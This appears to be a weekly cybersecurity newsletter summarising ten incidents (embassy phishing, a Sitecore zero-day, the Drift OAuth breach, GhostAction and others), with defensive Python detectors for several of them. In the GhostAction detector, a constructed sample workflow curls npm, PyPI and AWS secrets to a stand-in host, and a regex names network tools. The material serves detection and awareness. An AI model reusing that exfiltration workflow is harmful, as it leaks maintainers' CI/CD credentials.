The anti-hero of the week is a classic Word macro that was used to spear-phish 50+ embassies, ministries and international organisations. We also have France's CNIL threatening Google with a €100,000/day fine if it doesn't fix its cookie business.

I haven't done this in a while, but at the very end I have also included a "long form" article. If you're in information security, I think it's a good article to share as part of your regular awareness training: simple, relatable stories around phishing.

P.S. If you like you can get this news summary to your inbox every Monday. Scroll down to subscribe.

1. Iran’s MOIS-Linked ‘Homeland Justice’ APT Phishes 50+ Diplomatic Missions Worldwide

In August, Iran's Ministry of Intelligence-aligned Homeland Justice APT used 104 compromised email accounts to spear-phish more than 50 embassies, ministries and international organizations across six continents. The attackers sent macro-embedded Word documents from legitimate addresses, routed through a NordVPN exit node, to deploy an infostealer that relied on simple evasion techniques.

Key Details

  • Emails originated from hijacked official accounts (e.g., an Oman MFA mission in Paris, using addresses like @fm.gov.com) sent via a NordVPN exit node in Jordan.
  • Targets included ~50 embassies, consulates, ministries, UN agencies, African Union, World Bank and NGOs.
  • The VBA macros launched their payload with vbHide (no visible window) and stalled in multi-loop "laylay" delays before acting; the final payload, "sysProcUpdate", harvested system metadata.
  • The campaign ran for only a few days in August; researchers report that the attackers' C2 infrastructure now appears to be offline.

Next Steps

  • Block or sandbox macro-enabled documents from external senders; decide on the container contents, not just the file extension.
  • Search proxy and DNS logs for connections to known C2 domains (e.g., screenai.online) and for unexpected outbound VPN traffic.
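A mail-gateway style check for the first bullet, written for this newsletter as an added example (it is not code from the Dark Reading report or from the campaign): it looks inside the OOXML zip for a VBA project and a macro-enabled content type, so a .docm renamed to .docx is still caught, and it routes legacy OLE2 .doc files to a sandbox because their VBA cannot be seen without parsing the OLE streams. The two sample documents are constructed in memory; the quarantine policy and the name `should_quarantine` are assumptions for the demo.

```python
import io
import os
import re
import zipfile

# Constructed sample documents (built in memory, not real phishing samples).
# Real Word files carry many more parts; only the parts the check inspects are included.
def _build_ooxml(parts: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in parts.items():
            zf.writestr(name, data)
    return buf.getvalue()

CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
CONTENT_TYPES_PLAIN = (
    f'<Types xmlns="{CT_NS}"><Override PartName="/word/document.xml" '
    'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>'
).encode()
CONTENT_TYPES_MACRO = (
    f'<Types xmlns="{CT_NS}"><Override PartName="/word/document.xml" '
    'ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>'
    '<Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/></Types>'
).encode()
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # compound file header (legacy .doc, and vbaProject.bin)

SAMPLE_DOCX = _build_ooxml({"[Content_Types].xml": CONTENT_TYPES_PLAIN,
                            "word/document.xml": b"<w:document/>"})
SAMPLE_DOCM = _build_ooxml({"[Content_Types].xml": CONTENT_TYPES_MACRO,
                            "word/document.xml": b"<w:document/>",
                            "word/vbaProject.bin": OLE2_MAGIC + b"\x00" * 64})

MACRO_EXTENSIONS = {".docm", ".dotm", ".xlsm", ".xltm", ".xlam", ".pptm", ".potm", ".ppam"}
VBA_PART = re.compile(r"(^|/)vbaProject\.bin$", re.IGNORECASE)
MACRO_CONTENT_TYPE = re.compile(r"vnd\.ms-office\.vbaProject|macroEnabled", re.IGNORECASE)

def macro_indicators(filename: str, data: bytes) -> list:
    """Return the reasons a file should be treated as macro-capable (empty list = none found)."""
    reasons = []
    ext = os.path.splitext(filename)[1].lower()
    if ext in MACRO_EXTENSIONS:
        reasons.append(f"macro-enabled extension {ext}")
    if data.startswith(OLE2_MAGIC):
        # Legacy binary .doc/.xls: VBA lives in OLE streams, which this check does not parse.
        reasons.append("legacy OLE2 container; may hold VBA, route to sandbox")
        return reasons
    if not data.startswith(b"PK"):
        return reasons  # not an Office Open XML package
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            if any(VBA_PART.search(n) for n in names):
                reasons.append("embedded vbaProject.bin part")
            if "[Content_Types].xml" in names:
                ct = zf.read("[Content_Types].xml").decode("utf-8", "replace")
                if MACRO_CONTENT_TYPE.search(ct):
                    reasons.append("macro-enabled content type declared")
    except zipfile.BadZipFile:
        reasons.append("claims to be OOXML but is not a valid zip; route to sandbox")
    return reasons

def should_quarantine(filename: str, data: bytes, sender_is_external: bool) -> bool:
    """Assumed policy for the demo: external sender plus any macro indicator = hold for sandboxing."""
    return sender_is_external and bool(macro_indicators(filename, data))

if __name__ == "__main__":
    for name, blob in [("agenda.docx", SAMPLE_DOCX), ("agenda.docm", SAMPLE_DOCM), ("agenda.docx", SAMPLE_DOCM)]:
        print(name, macro_indicators(name, blob))
```

The third sample in the usage loop is the case an extension filter alone misses: macro-enabled content carried in a file named .docx.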

Read more at Dark Reading


2. CISA Orders Patch for Actively Exploited Sitecore Zero-Day

The Cybersecurity and Infrastructure Security Agency has mandated that all federal civilian agencies remediate a critical deserialization flaw in Sitecore products by September 25, 2025. Attackers used a publicly documented ASP.NET machine key to forge a valid ViewState MAC, so the server deserialized attacker-controlled data, giving them RCE; from there they deployed reconnaissance malware and escalated privileges in compromised environments.

Key Details

  • The flaw (CVE-2025-53690, CVSS 9.0) hinges on static machineKey values that were included in Sitecore deployment guides published before 2017 and then reused in production.
  • Mandiant disrupted an in-the-wild attack in which the exposed key let the attacker craft a ViewState payload that loaded a .NET assembly, "WEEPSTEEL", for system reconnaissance.

Next Steps

  • Apply Sitecore security bulletin KB1003865 before Sept. 25.
  • Rotate all ASP.NET machineKey values in web.config (unique per application, shared only across nodes of the same farm) and encrypt the machineKey section; rotation invalidates any ViewState or forms-auth ticket signed with the old key.
  • Monitor for anomalous __VIEWSTATE POST requests; IIS request logs do not record POST bodies, so pair them with ASP.NET "Viewstate verification failed" events in the Windows Application log.
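How the rotation step looks in practice, as an added example written for this newsletter (not Sitecore's or Mandiant's tooling): it audits a web.config for a machineKey whose values appear on an operator-supplied list of published keys or that uses a weak MAC algorithm, and rewrites the element with fresh keys sized the way IIS Manager generates them. The config fragment, the placeholder key strings and the `KNOWN_PUBLISHED_KEYS` list are constructed for the demo; the real published values come from the vendor bulletin.

```python
import secrets
import xml.etree.ElementTree as ET

# Constructed web.config fragment with a static machineKey of the kind copied from
# old deployment guides. The key values are placeholders, not the published Sitecore keys.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="PLACEHOLDER_PUBLISHED_VALIDATION_KEY"
                decryptionKey="PLACEHOLDER_PUBLISHED_DECRYPTION_KEY"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>"""

# Assumed operator-maintained list of key values known to have been published
# (populate from the vendor bulletin; placeholders here).
KNOWN_PUBLISHED_KEYS = {"PLACEHOLDER_PUBLISHED_VALIDATION_KEY", "PLACEHOLDER_PUBLISHED_DECRYPTION_KEY"}
WEAK_VALIDATION = {"MD5", "SHA1", "3DES"}

def generate_machine_key() -> dict:
    """Fresh keys sized as IIS Manager generates them: 64-byte HMAC key, 32-byte AES-256 key."""
    return {
        "validationKey": secrets.token_hex(64).upper(),
        "decryptionKey": secrets.token_hex(32).upper(),
        "validation": "HMACSHA256",
        "decryption": "AES",
    }

def audit_machine_key(config_xml: str) -> list:
    """Return findings for a web.config; an empty list means no static-key problem was found."""
    root = ET.fromstring(config_xml)
    mk = root.find("./system.web/machineKey")
    if mk is None:
        return []  # no explicit element: ASP.NET auto-generates keys per application pool
    findings = []
    for attr in ("validationKey", "decryptionKey"):
        if mk.get(attr, "AutoGenerate") in KNOWN_PUBLISHED_KEYS:
            findings.append(f"{attr} matches a publicly documented key")
    algorithm = mk.get("validation", "HMACSHA256")
    if algorithm.upper() in WEAK_VALIDATION:
        findings.append(f"weak ViewState MAC algorithm {algorithm}")
    return findings

def rotate_machine_key(config_xml: str) -> str:
    """Replace (or add) the machineKey element with freshly generated values."""
    root = ET.fromstring(config_xml)
    system_web = root.find("system.web")
    if system_web is None:
        system_web = ET.SubElement(root, "system.web")
    mk = system_web.find("machineKey")
    if mk is None:
        mk = ET.SubElement(system_web, "machineKey")
    for attr, value in generate_machine_key().items():
        mk.set(attr, value)
    return ET.tostring(root, encoding="unicode")

if __name__ == "__main__":
    print(audit_machine_key(SAMPLE_WEB_CONFIG))
    print(rotate_machine_key(SAMPLE_WEB_CONFIG))
```

Run the rotated output through `aspnet_regiis -pe` (or your deployment pipeline's equivalent) afterwards so the new keys are stored encrypted rather than in clear text, and roll every node of a farm at the same time, since ViewState signed on one node must verify on the others.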

Read more at Sitecore Support, CISA, Mandiant


3. Salesloft Drift Supply-Chain Breach Exposes Customer Data at Cloudflare, Zscaler and Palo Alto Networks

A threat actor tracked as UNC6395 used OAuth tokens stolen from the Salesloft Drift chatbot integration to access and exfiltrate data from the Salesforce instances of hundreds of organizations, including Cloudflare, Zscaler and Palo Alto Networks. The stolen data, ranging from business contact details to support-ticket contents and any secrets pasted into them, has prompted all three firms to disable the Drift integration, rotate credentials and notify affected customers.

Key Details

  • Attack window: August 8–18, 2025; reconnaissance began August 9.
  • Cloudflare found 104 API tokens in support-ticket text fields; none showed misuse but were rotated.
  • Zscaler and Palo Alto Networks confirmed exposure of customer names, emails, phone numbers, case metadata and some commercial licensing details.
  • No core services or infrastructure at the breached vendors were compromised—only their Salesforce CRM data was accessed via the third-party integration.

Next Steps

  • Disconnect Salesloft Drift integrations immediately.
  • Rotate OAuth tokens, API keys and any shared credentials, starting with anything that was ever pasted into a support case.
  • Review Salesforce login history and Bulk API / event-monitoring logs for unusual activity, in particular large queries from the Drift connected app during the attack window.
  • Strengthen third-party SaaS governance and enforce token expiration policies.
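The Cloudflare finding above (104 API tokens sitting in support-ticket text) is the part of this story most teams can act on today. Below is an added example, written for this newsletter and not taken from any of the vendors' posts, of a scanner that runs over exported CRM ticket bodies and flags credential-looking strings: fixed-format tokens by pattern, plus generic `key = value` assignments whose value has high Shannon entropy. The ticket records and token values are constructed (the AWS one is Amazon's documented example key); the patterns cover a few common formats and are meant to be extended.

```python
import math
import re
from collections import Counter

# Constructed support-ticket records; every token value below is synthetic.
SAMPLE_TICKETS = [
    {"id": "CASE-1001", "body": "Tunnel won't start. My env has aws_access_key_id=AKIAIOSFODNN7EXAMPLE, any idea?"},
    {"id": "CASE-1002", "body": "Please reset my dashboard password, thanks."},
    {"id": "CASE-1003", "body": "Here is the token you asked for: ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef012345"},
    {"id": "CASE-1004", "body": "Request header: Authorization: Bearer q7Hs2kLm9Pz4Rt6Vw8Xy1Bn3Cd5Fg0Jk"},
    {"id": "CASE-1005", "body": "Our integration uses api_key: Zf8Kq2Lm7Nw3Rt9Vx4Bp6Cd1Gh5Jy0"},
]

# Fixed-format credentials that can be matched by shape alone.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_token":      re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"),
    "slack_token":       re.compile(r"\bxox[abpr]-[0-9A-Za-z-]{10,}\b"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "bearer_token":      re.compile(r"\bBearer\s+([A-Za-z0-9._~+/=-]{20,})"),
}
# Generic "name = value" assignments; kept only when the value looks random enough.
GENERIC_ASSIGNMENT = re.compile(
    r"(?i)\b(?:api[_-]?key|secret|token|password|passwd)\s*[:=]\s*['\"]?([A-Za-z0-9_\-]{20,})")

def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def find_secrets(text: str) -> list:
    """Return (kind, value) pairs for credential-looking strings in free text."""
    hits, seen = [], set()
    for kind, pattern in PATTERNS.items():
        for m in pattern.finditer(text):
            value = m.group(m.lastindex or 0)   # capture group if the pattern has one
            if value not in seen:
                seen.add(value)
                hits.append((kind, value))
    for m in GENERIC_ASSIGNMENT.finditer(text):
        value = m.group(1)
        if value not in seen and shannon_entropy(value) > 3.5:
            seen.add(value)
            hits.append(("high_entropy_assignment", value))
    return hits

def redact(value: str) -> str:
    """Never copy the full secret into the report; a prefix/suffix is enough to locate it."""
    return value[:4] + "..." + value[-4:]

def scan_tickets(tickets: list) -> list:
    return [{"ticket": t["id"], "kind": kind, "preview": redact(value)}
            for t in tickets for kind, value in find_secrets(t["body"])]

if __name__ == "__main__":
    for row in scan_tickets(SAMPLE_TICKETS):
        print(row)
```

Every hit is a token to rotate regardless of whether the logs show misuse, which is the position Cloudflare took; the report deliberately carries only a redacted preview so that the scan output does not become a second copy of the secrets.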

Read more at The Record, Cloudflare Blog, Zscaler Blog, Palo Alto Networks Blog


4. Jaguar Land Rover Production and Retail Halted by Cyber Incident

Jaguar Land Rover proactively shut down global IT systems to contain a cyberattack, leading to multi-day stoppages in car production at Halewood and in retail operations. No customer data appears to have been compromised.

Key Details

  • Halewood plant staff told not to work from Monday through Wednesday.
  • Production at Solihull and dealer systems also affected.
  • No evidence of customer data exfiltration; incident type undisclosed.
  • JLR revenue ~£29 billion; automotive downtime can cost ~£1.6 million per hour.

Read more at The Record, Bleeping Computer, Cybersecurity News


5. Cloudflare Mitigates Record 11.5 Tbps UDP Flood DDoS Attack

Cloudflare's automated defenses stopped a hyper-volumetric UDP flood that peaked at 11.5 Tbps and 5.1 billion packets per second in a 35-second burst, preventing any customer-facing disruption. The record attack was sourced from a mix of compromised IoT devices and multiple cloud providers.

Key Details

  • Largest of hundreds of hyper-volumetric attacks blocked by Cloudflare in recent weeks.
  • Attack mixed IoT-based botnets with traffic from several public cloud platforms.
  • Volumetric attacks account for about 75% of all DDoS attacks.

Read more at Dark Reading


6. GhostRedirector Uses Malicious IIS Module for SEO Fraud on 65 Windows Servers

A China-aligned group dubbed GhostRedirector has infected at least 65 Windows servers since August 2024 with two custom tools, Rungan, a C++ backdoor, and Gamshen, a malicious IIS module, to manipulate Google search rankings for gambling sites without affecting normal visitors. By serving altered responses only to Googlebot, the attackers create artificial backlinks that can damage the compromised sites' SEO reputation. Security teams should review installed IIS modules, tighten administrative access, and compare what their sites serve to crawlers with what they serve to browsers.

Key Details

  • Victims span healthcare, retail, transportation, education, and tech in Brazil, Thailand, Vietnam, the US, Peru, Canada, and Europe.
  • Initial entry likely via SQL injection, followed by PowerShell downloads from “868id[.]com.”
  • Rungan backdoor supports remote commands; Gamshen injects SEO payloads only when detecting Googlebot.
  • Attackers used the EfsPotato and BadPotato privilege-escalation exploits to create persistent administrator accounts.

Next Steps

  • Audit all IIS modules (native modules via Get-WebGlobalModule, managed modules in web.config) against a known-good baseline and remove unauthorized extensions.
  • Enforce MFA and least privilege for IIS and database accounts, and fix the SQL injection that let the attackers in.
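A cheap external check for the cloaking behaviour described above, added here as an example for this newsletter (it is not ESET's code, and the mock server is a stand-in for a compromised site, not the Gamshen module): fetch the same URL once with a browser User-Agent and once with Googlebot's, and report links that only the crawler receives. The page content, the casino link and the mock handler are constructed; `check_cloaking` accepts an injected fetch function so the logic can be exercised without a network.

```python
import re
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for a compromised site: serves the real page to browsers and the
# same page with an injected gambling backlink when the User-Agent claims to be Googlebot.
CLEAN_PAGE = b'<html><body><h1>Clinic appointments</h1><a href="/contact">Contact</a></body></html>'
INJECTED_LINK = b'<a href="http://casino.example/">best online casino</a>'

def mock_response(user_agent: str) -> bytes:
    if "googlebot" in user_agent.lower():
        return CLEAN_PAGE.replace(b"</body>", INJECTED_LINK + b"</body>")
    return CLEAN_PAGE

class CloakingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = mock_response(self.headers.get("User-Agent", ""))
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass

def start_mock_server() -> HTTPServer:
    server = HTTPServer(("127.0.0.1", 0), CloakingHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server

BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/128.0 Safari/537.36"
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
LINK_RE = re.compile(rb'<a\s[^>]*href="([^"]+)"', re.IGNORECASE)

def http_fetch(url: str, user_agent: str) -> bytes:
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read()

def check_cloaking(url: str, fetch=http_fetch) -> dict:
    """Fetch once as a browser and once as Googlebot; report links only the crawler sees."""
    as_browser = fetch(url, BROWSER_UA)
    as_bot = fetch(url, GOOGLEBOT_UA)
    bot_only = set(LINK_RE.findall(as_bot)) - set(LINK_RE.findall(as_browser))
    return {"cloaked": as_browser != as_bot,
            "bot_only_links": sorted(link.decode() for link in bot_only)}

if __name__ == "__main__":
    server = start_mock_server()
    print(check_cloaking(f"http://127.0.0.1:{server.server_port}/"))
    server.shutdown()
```

Two caveats: compare link sets rather than raw bytes on real sites, because legitimate pages also vary by User-Agent (mobile layouts, A/B tests); and a module that additionally verifies the client IP against Google's ranges will not reveal itself to a spoofed User-Agent, so confirm with Google Search Console's URL Inspection, which shows what Google's own crawler fetched.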

Read more at ESET, The Record


7. US Offers $10M Reward for Info on FSB Hackers Exploiting Cisco Flaw

The U.S. Department of State is offering up to $10 million for information on three FSB officers accused of exploiting CVE-2018-0171, a flaw in the Smart Install feature of end-of-life Cisco devices, to breach U.S. critical infrastructure and more than 500 foreign energy firms. These state-sponsored actors installed backdoors and conducted reconnaissance of industrial control systems across government and energy networks. Smart Install listens on TCP 4786; on devices that still have it enabled, disable it with `no vstack` and keep the port off the internet.

Key Details

  • Reward targets Marat Tyukov, Mikhail Gavrilov, and Pavel Akulov of FSB’s Center 16 (aka Berserk Bear, Blue Kraken).
  • Victims include the U.S. Nuclear Regulatory Commission and Wolf Creek Nuclear Operating Corp.

Read more at BleepingComputer


8. CNIL Fines Google €325M and Shein €150M for Cookie Consent Violations, Warns of €100,000/Day If Not Fixed

France's data protection regulator (CNIL) has fined Google €325 million and fast-fashion retailer Shein €150 million for deploying advertising cookies and in-Gmail ads without valid user consent, breaching the French Data Protection Act and the Postal and Electronic Communications Code. Both firms must comply with revised consent flows within six months or face penalties of up to €100,000 per day.

Key Details

  • Google pushed default targeted-ad cookies during account setup and injected ads into Gmail “Promotions” and “Social” tabs without clear opt-outs.
  • CNIL found over 74 million affected Google accounts and ruled that consent was neither informed nor freely given.
  • Shein’s cookie banners lacked complete information and gave users inadequate refusal options; the retailer has since updated its platform but will appeal.
  • CNIL warns of €100,000/day fines if systems aren’t aligned with French cookie-consent rules by March 2026.

Next Steps

  • Audit all cookies and the consent banners that govern them: no advertising cookie before consent, complete information on purposes, and a refuse option as prominent as accept.
  • Validate compliance against CNIL's cookie guidelines and re-test after every change to the consent flow.

Read more at The Hacker News


9. GhostAction Supply Chain Attack Steals Over 3,300 Secrets from Hundreds of GitHub Repositories

On September 2–5, attackers inserted malicious GitHub Actions workflows into 817 repositories to harvest 3,325 CI/CD secrets — including npm, PyPI, DockerHub tokens and AWS credentials — and exfiltrate them to an external server. GitGuardian discovered the “GhostAction” campaign, alerted 573 maintainers, and prompted platforms to lock affected projects and monitor for unauthorized package releases and cloud access.

Key Details

  • Attackers personalized each commit by matching existing secret names in Python, JavaScript, Rust and Go repos.
  • The exfiltration server was at IP 45.139.104.115 under the "plesk.page" domain until September 5.
  • No malicious package releases confirmed yet, but 9 npm and 15 PyPI projects still have compromised tokens.
  • Some stolen credentials were already used to probe AWS environments and database services.

Next Steps

  • Scan repositories for unexpected commits titled "Github Actions Security" and review every workflow file they touched.
  • Rotate and revoke all exposed CI/CD tokens immediately.
  • Monitor npm, PyPI and cloud accounts for unauthorized publishes or logins.
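The GhostAction workflows had a simple shape: secrets mapped into environment variables, then shipped to an outside host with a single command. An added example for this newsletter (not GitGuardian's tooling, and the sample workflows are constructed to mimic the described pattern rather than copied from any victim repository) scans workflow text for that shape and for the related trick of dumping the whole `secrets` context with `toJSON(secrets)`. The trusted-host list and the host-matching rule are assumptions to adapt to your own registries and internal endpoints.

```python
import re
from urllib.parse import urlparse

# Constructed sample mimicking the pattern described above: secrets into env, then POSTed out.
SUSPICIOUS_WORKFLOW = """name: Github Actions Security
on: [push]
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - name: Security scan
        env:
          PYPI_TOKEN: ${{ secrets.PYPI_API_TOKEN }}
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
          AWS_SECRET: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        run: |
          curl -s -X POST https://collector.example.net/upload -d "p=$PYPI_TOKEN&n=$NPM_TOKEN&a=$AWS_SECRET"
"""

# Constructed benign publish workflow: one secret, no outbound request to an unknown host.
BENIGN_WORKFLOW = """name: Publish
on:
  release:
    types: [published]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
ALL_SECRETS = re.compile(r"toJSON\s*\(\s*secrets\s*\)", re.IGNORECASE)
# A download/upload tool followed, on the same line, by an http(s) URL.
OUTBOUND = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|nc|ncat)\b[^\n]*?(https?://[^\s'\"]+)", re.IGNORECASE)
# Assumed allow-list; add your own registries and internal endpoints.
TRUSTED_HOSTS = ("github.com", "api.github.com", "githubusercontent.com",
                 "registry.npmjs.org", "upload.pypi.org")

def host_is_trusted(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)

def scan_workflow(text: str) -> dict:
    """Flag workflows that reference secrets and talk to hosts outside the allow-list."""
    findings = []
    secret_names = sorted(set(SECRET_REF.findall(text)))
    if ALL_SECRETS.search(text):
        findings.append("dumps the entire secrets context via toJSON(secrets)")
    untrusted = [url for _tool, url in OUTBOUND.findall(text) if not host_is_trusted(url)]
    for url in untrusted:
        findings.append(f"outbound request to untrusted host: {url}")
    if untrusted and secret_names:
        findings.append(f"{len(secret_names)} secret(s) referenced alongside an untrusted outbound request: "
                        + ", ".join(secret_names))
    return {"secrets": secret_names, "findings": findings, "suspicious": bool(findings)}

if __name__ == "__main__":
    for label, wf in (("suspicious", SUSPICIOUS_WORKFLOW), ("benign", BENIGN_WORKFLOW)):
        print(label, scan_workflow(wf))
```

Run it over every file under `.github/workflows/` at each commit the earlier bullet turns up, and treat a hit as a rotation trigger for every secret named, since the point of the campaign was the tokens rather than the workflow itself.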

Read more at Hackread.com


10. Long form Recommendation: Examples of High-stakes Phishing Campaigns

It's a good article with very specific examples of phishing that anyone non-technical can relate to. It's a good one to share as part of regular security awareness training.


Read more at CSO Online: You should be aware of these latest social engineering trends



Subscribe

Subscribe to receive the weekly cybersecurity news summary in your inbox every Monday.
